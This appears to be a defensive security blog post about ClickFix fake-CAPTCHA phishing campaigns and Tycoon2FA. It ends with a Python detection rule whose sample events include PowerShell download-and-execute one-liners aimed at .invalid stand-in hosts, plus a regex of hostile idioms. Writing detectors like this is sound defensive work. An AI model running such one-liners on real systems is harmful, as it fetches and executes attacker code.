
Warning: New Fake CAPTCHA Scam Explodes Credential Theft

Cybercriminals have found a psychological “cheat code” to get past your defences: the CAPTCHA. In the first quarter of 2026, Microsoft Threat Intelligence blocked a staggering 8.3 billion phishing emails, but the real story is how those attacks were delivered.

As automated email filters get better at blocking malicious links, attackers are hiding their lures behind layered social-engineering tricks such as fake CAPTCHA gates and “ClickFix” prompts. By the end of March 2026, CAPTCHA-gated phishing had surged 125%, reaching a 12-month high of 11.9 million incidents in a single month.


The Rise of “ClickFix”: When You Are the Malware

Traditional malware arrives as a file you download and open. The “ClickFix” technique is more devious: it talks you into running the attacker’s code yourself, so there is nothing for a scanner to inspect until the command is already executing.

  • The Lure: You arrive at a page that looks like a routine security check or a “browser error” page.
  • The Trick: The page tells you that to “fix” a technical issue or prove you are human, you must copy a string of text and paste it into the Run dialog (Win+R) or a PowerShell or Terminal window, then press Enter.
  • The Result: The text is an obfuscated PowerShell one-liner, typically one that downloads and runs a second stage. The moment you press Enter, you execute the attacker’s payload yourself, often an information stealer such as Lumma Stealer, or a credential-harvesting flow run by a kit such as Tycoon2FA. Because no file is attached to the email and no download is clicked, attachment scanners and URL filters never see a payload; the only artefacts are a clipboard paste and a shell process on the endpoint.

Rapid Rotation: From HTML to a 356% PDF Surge

Attackers are currently running real-time experiments to see what slips past your inbox. In Q1 2026, they rotated through file formats at a dizzying pace:

  • SVG files: 49% spike (February). Used in 1.2 million messages to hide credential-harvesting forms inside what look like image files.
  • HTML attachments: 175% increase. Function as “portable” phishing sites that render locally in the victim’s browser, so no hosted page has to survive takedown.
  • PDF files: 356% surge (March). Now the #1 vehicle for CAPTCHA lures, hitting a 12-month volume high.


PDFs have become the favorite carrier because they are widely trusted by users and often receive less scrutiny from basic email gateways than .zip or .html files.


Tycoon2FA: The Industrialization of Phishing

The engine behind many of these attacks is Tycoon2FA (Storm-1747), a Phishing-as-a-Service (PhaaS) platform. A major international law enforcement operation disrupted Tycoon2FA in March 2026, but its “legacy” lives on.

As Tycoon’s market share dropped from 75% to 41%, aggressive newcomers such as Kratos and EvilTokens moved in to fill the gap. The CAPTCHA-gate technique is therefore no longer a “specialty”; it is a commodity feature available to any low-skill operator for a few hundred dollars.


How to Protect Your Organization

With 94% of payload-based attacks now aimed at credentials, the conclusion is clear: a password alone is not enough.

  1. Enforce FIDO2 Passkeys: Move away from SMS or app-based MFA codes, which an “Adversary-in-the-Middle” (AiTM) kit such as Tycoon2FA simply relays to the real login page in real time. Passkeys are phishing-resistant because the signature is bound to the genuine site’s origin, so a proxy sitting on a look-alike domain cannot reuse it.
  2. Verify the CAPTCHA: Teach employees that a legitimate website never asks them to press Win+R, or open a Terminal or Command Prompt, and paste in a command to solve a CAPTCHA or “fix” an error. If a page asks for that, close it and report it.
  3. Enable ZAP: Turn on Zero-hour Auto Purge (ZAP) in Microsoft Defender for Office 365 so that messages judged malicious after delivery are retroactively pulled from mailboxes.
  4. Watch the endpoint: Use EDR (Endpoint Detection and Response) to alert on unusual parent-child process relationships, such as chrome.exe or msedge.exe spawning powershell.exe, cmd.exe or mshta.exe, and on explorer.exe spawning powershell.exe with an encoded (-EncodedCommand) or hidden-window command line, which is what a Win+R paste looks like in telemetry. During triage, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU shows what the user actually pasted.
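To make the ClickFix chain described above and the parent-child detection in step 4 concrete, here is a small triage rule written for this post; it is an added example, not code from the original page, from Microsoft, or from any EDR product. It scores Sysmon-style process-creation events (parent image, image, command line), decodes a -EncodedCommand argument the way PowerShell would (base64 over UTF-16LE) so the analyst can see what was pasted, and flags a browser spawning a shell outright, but flags an explorer.exe parent (the Win+R path) only when the command line itself looks hostile, since explorer.exe also starts legitimate shells. The browser and shell executable names, the hostile-token list, and the sample events and one-liner are assumptions constructed for the example; the host names use the reserved .invalid TLD and nothing is fetched or executed.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed process names. A browser spawning a shell alerts outright; explorer.exe is
# the parent of anything launched from the Win+R Run dialog but also of legitimate
# shells, so it only alerts when the command line itself looks hostile.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
RUN_DIALOG_PARENT = "explorer.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Download-and-execute idioms typical of pasted one-liners, plus hidden-window flags (assumed list).
HOSTILE = re.compile(
    r"\b(?:iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|"
    r"downloadstring|frombase64string)\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """The three Sysmon Event ID 1 fields the rule needs."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none.
    PowerShell expects base64 over the UTF-16LE encoding of the script text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent) -> List[str]:
    """Reasons this event should alert; an empty list means it is not flagged."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if child not in SHELLS:
        return []
    decoded = decode_encoded_command(ev.command_line)
    # Scan the raw command line and, if present, the decoded script for hostile idioms.
    content = ev.command_line + ("\n" + decoded if decoded else "")
    hostile = sorted({m.group(0).lower() for m in HOSTILE.finditer(content)})
    reasons = []
    if parent in BROWSERS:
        reasons.append(f"{parent} spawned {child}")
    elif parent == RUN_DIALOG_PARENT and (decoded is not None or hostile):
        reasons.append(f"{child} launched from explorer.exe (Win+R Run dialog pattern)")
    if not reasons:
        return []
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded.strip()[:80])
    if hostile:
        reasons.append("hostile tokens: " + ", ".join(hostile))
    return reasons


def triage(events: List[ProcEvent]) -> List[tuple]:
    """(index, reasons) for every event that alerts."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample one-liner, encoded the way an -EncodedCommand argument is prepared.
# The host is a reserved .invalid name; nothing is fetched or run.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed events (not real telemetry): two ClickFix-style launches, then three benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc " + SAMPLE_ENCODED),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -nop -w hidden -c "iex (irm https://captcha.example.invalid/verify)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),  # user opened a shell normally: not flagged
    ProcEvent(r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
              r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
              "msedge.exe --type=renderer"),  # child is not a shell
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\nightly-backup.ps1"),  # scheduled script
]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}:")
        for r in reasons:
            print("   ", r)
```

Only the first two sample events alert. In a real deployment the same logic maps onto an EDR or Sigma rule over Sysmon Event ID 1 (or Windows Security event 4688 with command-line auditing enabled); the point of decoding the blob in the alert is that the analyst sees the download-and-execute one-liner immediately instead of a wall of base64.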
